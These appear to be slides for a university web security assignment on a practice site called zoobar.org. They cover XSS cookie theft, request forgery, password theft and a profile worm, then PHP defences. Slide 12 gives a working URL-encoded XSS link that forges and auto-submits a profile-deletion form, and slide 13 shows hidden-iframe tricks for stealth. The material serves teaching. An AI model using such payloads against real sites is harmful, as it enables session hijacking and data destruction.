
Page 1

Project 2: Web App Security

Collin Jackson

CS 155 Spring 2007

Page 2

Part 1: Attacks

Page 3

Overview

• Explore several attack types
• Requires both effectiveness and stealth
• Learn:
  • How an attacker can evade sanitization
  • Consequences of an exploit
  • JavaScript
  • Very basic CSS

Page 4

Attacks

A: Cookie Theft. Use URL encoding. Could hijack session.
B: Request Forgery. Navigate browser. Use iframes, forms.
C: Password Theft. Evade sanitization. Handle DOM events.
D: Profile Worm. Persistent attack. Replicates.

[Diagram: attack flows between zoobar.org, badguy.com and stanford.edu; labelled elements: link, email, form, redirect]

Page 5

Sanitization

Works differently depending on context:

<tag property="attackstring">
  Attack: Break out with ' "
  Defense: escape quotes with \

<body>attackstring</body>
  Attack: Launch script with < >
  Attack: Close off parent tag </tag>
  Defense: escape angle brackets

eval(attackstring)
  Attack: Do whatever you want
  Defense: Don't do that

Page 6

Example: Profile Deleter

Malicious hyperlink deletes profile of user who clicks it
  Only works when user logged in
    User might have multiple tabs open
    Might have chosen/forgotten not to log out
  Might appear in another user's profile
Uses vulnerability in users.php from Attack A
Constructs profile deletion form and submits it

???

Page 7

Find vulnerability

Site reflects query parameter in input field
Link can include anything we want here

Page 8

Copy form data

View source to find form fields
Create copycat form with our modifications

Page 9

Close previous <input>, <form>
Button click triggers form submit
URL encode:
  http://scriptasylum.com/tutorials/encdec/encode-decode.html
  http://www.dommermuth-1.com/protosite/experiments/encode/index.html

Page 10

Debugging

Check error
It didn't work. Open JavaScript console.
Undefined. No properties!
Two forms with same name

Page 11

Fixed version

Now with correct form

Page 12

Final Test

users.php replaced with index.php
Profile deleted

http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E

Page 13

Stealthier approaches

Post form into hidden iframe:
  <form name=F action=/index.php target=myframe>…
  <iframe name=myframe style="visibility:hidden">…

Open page with form in hidden iframe:
  <iframe name=myframe style="visibility:hidden">…
  <script>document.myframe.contentDocument.forms[0].profile_update.value = "";</script>

Page 14

Part 2: Defenses

Page 15

Goals

• Learn:
  • How easy it is to make mistakes
  • That even simple code can be hard to secure
  • Techniques for appropriate input validation
  • PHP
  • Very basic SQL

Little programming knowledge can be a dangerous thing

Page 16

File structure

index.php
users.php
transfer.php
login.php
includes/
  auth.php (cookie authentication)
  common.php (includes everything else)
  navigation.php (site template)
db/
  zoobar/
    Person.txt (must be writable by web server)

Includes /usr/class/cs155/projects/pp2/txt-db-api/…

Only edit these files

Page 17

txt-db-api

Third-party text file database library
Data can be int, string, and autoincrement
Need to escape strings: \' \" \\
Actually magic_quotes_gpc does this for us

    $recipient = $_POST['recipient']; // already escaped by magic_quotes_gpc
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executeQuery($sql);
    if ($rs->next())
        $id = $rs->getCurrentValueByName('PersonID');

Page 18

Defenses to Part 1

A: Cookie Theft
B: Request Forgery
C: Password Theft
D: Profile Worm

Page 19

PHP Sanitization Techniques

addslashes(string)
  Prepends backslash to ' " \
  Already done by magic_quotes_gpc
  Inverse: stripslashes(string)

htmlspecialchars(string [, quote_style])
  Converts & < > " to HTML entities
  Use ENT_QUOTES to change ' to &#039;

strip_tags(string [, allowable_tags])
  Max tag length 1024
  Does not sanitize tag properties

preg_replace(pattern, replacement, subject)

More info: http://php.net

Page 20

More XSS hunting

Look for untrusted input used as output
Note sanitization already applied to each variable
  Form data has magic_quotes_gpc, db data does not
Sanitize the output if necessary
  No penalty for erring on the side of caution
  But sanitizing multiple times may lead to problems
No credit for solving non-goals: SQL injection, etc.
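An added example, not code from the slides or the zoobar project, that puts slides 5, 19 and 20 together in PHP: the break-out string that slide 12's payload decodes to is reflected into an input field first with only magic-quote slashes and then with htmlspecialchars, and a form value and a database value are each escaped exactly once for the boundary they cross. The $magicQuotesOn flag stands in for PHP 5's get_magic_quotes_gpc(), and rawFromForm, forSql, forHtml and injectedTags are names chosen here, not project functions.

```php
<?php
// Added example, not the project's code: escape once, for the sink the value
// goes to. Slide 5: an HTML parser ignores backslashes, so the addslashes()
// that magic_quotes_gpc applies to form data does not stop an attribute
// break-out. Slide 20: form data is already slashed, database data is not,
// and escaping twice is its own bug. So normalise to raw text, then escape.

// Constructed inputs. The break-out string is what slide 12's payload
// decodes to; the second value is what Person.txt hands back unescaped.
$magicQuotesOn = true;                                       // project's PHP 5 setup
$postValue = addslashes('"></form><form name=profileform>');  // as $_POST delivers it
$dbValue   = "I'm <b>bold</b>";                              // txt-db-api returns raw text

// Undo magic_quotes_gpc so every later step sees the text the user typed.
// Under PHP 5 test get_magic_quotes_gpc() instead of passing a flag.
function rawFromForm(string $v, bool $magicQuotesOn): string {
    return $magicQuotesOn ? stripslashes($v) : $v;
}

// txt-db-api boundary (slide 17): backslash-escape ' " \ for the query string.
function forSql(string $raw): string {
    return addslashes($raw);
}

// Browser boundary (slide 19): entity-encode for attribute or body context.
// ENT_QUOTES turns ' into &#039; too, so single-quoted attributes are covered.
function forHtml(string $raw): string {
    return htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
}

// Tags in the rendered markup beyond the <input> itself.
function injectedTags(string $html): int {
    return substr_count($html, '<') - 1;
}

$raw = rawFromForm($postValue, $magicQuotesOn);

// Slide 5 / slide 7: the query parameter reflected into value="..." of the
// users.php input field, with only magic-quote slashes, then entity-encoded.
$unsafe = '<input name="user" value="' . $postValue . '">';
$safe   = '<input name="user" value="' . forHtml($raw) . '">';
printf("slashes only:     %d injected tags\n", injectedTags($unsafe));
printf("htmlspecialchars: %d injected tags\n", injectedTags($safe));

// Slide 20: both sources get the same treatment, once per boundary.
echo forSql($raw), "\n";         // slashes for the query, added exactly once
echo forHtml($dbValue), "\n";    // db data gets the output escaping it never had
echo forHtml($postValue), "\n";  // skipping rawFromForm shows a stray backslash
echo forSql($postValue), "\n";   // ...and doubles the backslashes stored in Person.txt
```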

Page 21

Good luck!